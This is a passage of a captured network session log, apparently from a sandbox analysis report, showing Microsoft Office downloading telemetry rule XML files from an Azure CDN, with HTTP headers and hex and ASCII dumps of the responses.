                              Content-Length: 450
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                              ETag: "0x8DC582BD4C869AE"
                              x-ms-request-id: 59158d4f-901e-00a0-5491-3f6a6d000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145911Z-174f7845968kvnqxhC1EWRmf3g0000000ku000000000d7pr
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:11 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                              Session IDSource IPSource PortDestination IPDestination Port
                              23192.168.2.44976613.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:11 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:11 UTC494INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:11 GMT
                              Content-Type: text/xml
                              Content-Length: 3788
                              Connection: close
                              Vary: Accept-Encoding
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                              ETag: "0x8DC582BAC2126A6"
                              x-ms-request-id: 0b3277ea-501e-00a0-5e91-3f9d9f000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145911Z-174f7845968vqt9xhC1EWRgten0000001060000000004pea
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:11 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                              Session IDSource IPSource PortDestination IPDestination Port
                              24192.168.2.44976913.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:11 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:11 UTC494INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:11 GMT
                              Content-Type: text/xml
                              Content-Length: 2160
                              Connection: close
                              Vary: Accept-Encoding
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                              ETag: "0x8DC582BA3B95D81"
                              x-ms-request-id: 6eac4bdd-a01e-006f-1c91-3f13cd000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145911Z-174f7845968nxc96hC1EWRspw80000000zqg00000000f49d
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:11 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                              Session IDSource IPSource PortDestination IPDestination Port
                              25192.168.2.44977213.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:13 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:13 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:13 GMT
                              Content-Type: text/xml
                              Content-Length: 474
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                              ETag: "0x8DC582B9964B277"
                              x-ms-request-id: 25544c2c-a01e-00ab-8007-419106000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145913Z-174f7845968l4kp6hC1EWRe88400000010cg0000000053un
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:13 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                              Session IDSource IPSource PortDestination IPDestination Port
                              26192.168.2.44977313.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:13 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:13 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:13 GMT
                              Content-Type: text/xml
                              Content-Length: 415
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                              ETag: "0x8DC582B9F6F3512"
                              x-ms-request-id: 9e5d2c34-901e-0083-1a26-41bb55000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145913Z-174f7845968j6t2phC1EWRcfe800000010b00000000015ur
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:13 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                              Session IDSource IPSource PortDestination IPDestination Port
                              27192.168.2.44977513.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:13 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:13 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:13 GMT
                              Content-Type: text/xml
                              Content-Length: 471
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                              ETag: "0x8DC582BB10C598B"
                              x-ms-request-id: f4f389a9-e01e-0020-2c00-42de90000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145913Z-174f784596886s2bhC1EWR743w0000001060000000004esz
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:13 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                              Session IDSource IPSource PortDestination IPDestination Port
                              28192.168.2.44977413.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:13 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:13 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:13 GMT
                              Content-Type: text/xml
                              Content-Length: 632
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                              ETag: "0x8DC582BB6E3779E"
                              x-ms-request-id: 6f96f590-e01e-0099-0e7f-3fda8a000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145913Z-174f78459685726chC1EWRsnbg00000010700000000037nu
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:13 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                              Session IDSource IPSource PortDestination IPDestination Port
                              29192.168.2.44977613.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:13 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:13 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:13 GMT
                              Content-Type: text/xml
                              Content-Length: 467
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                              ETag: "0x8DC582BA6C038BC"
                              x-ms-request-id: 3360fb1d-601e-0097-3291-3ff33a000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145913Z-174f784596886s2bhC1EWR743w000000100000000000f5mt
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:13 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                              Session IDSource IPSource PortDestination IPDestination Port
                              30192.168.2.44977913.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:15 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:16 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:15 GMT
                              Content-Type: text/xml
                              Content-Length: 427
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                              ETag: "0x8DC582BA310DA18"
                              x-ms-request-id: c665a67d-901e-002a-1b91-3f7a27000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145915Z-174f7845968n2hr8hC1EWR9cag0000000zp000000000d770
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:16 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                              Session IDSource IPSource PortDestination IPDestination Port
                              31192.168.2.44977713.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:15 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:16 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:15 GMT
                              Content-Type: text/xml
                              Content-Length: 407
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                              ETag: "0x8DC582BBAD04B7B"
                              x-ms-request-id: e2bedc78-c01e-0066-2f35-40a1ec000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145915Z-174f7845968nxc96hC1EWRspw80000000zwg000000004ame
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:16 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                              Session IDSource IPSource PortDestination IPDestination Port
                              32192.168.2.44977813.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:15 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:16 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:15 GMT
                              Content-Type: text/xml
                              Content-Length: 486
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                              ETag: "0x8DC582BB344914B"
                              x-ms-request-id: ce432a70-201e-0085-602f-4234e3000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145915Z-174f7845968xlwnmhC1EWR0sv80000000zzg00000000474y
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
                              2024-11-29 14:59:16 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                              Session IDSource IPSource PortDestination IPDestination Port
                              33192.168.2.44978013.107.246.63443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:59:15 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                              Connection: Keep-Alive
                              Accept-Encoding: gzip
                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                              Host: otelrules.azureedge.net
                              2024-11-29 14:59:16 UTC470INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:59:15 GMT
                              Content-Type: text/xml
                              Content-Length: 486
                              Connection: close
                              Cache-Control: public, max-age=604800, immutable
                              Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                              ETag: "0x8DC582B9018290B"
                              x-ms-request-id: dc0e488f-901e-005b-3891-3f2005000000
                              x-ms-version: 2018-03-28
                              x-azure-ref: 20241129T145915Z-174f7845968kvnqxhC1EWRmf3g0000000kw0000000009132
                              x-fd-int-roxy-purgeid: 0
                              X-Cache: TCP_HIT
                              Accept-Ranges: bytes
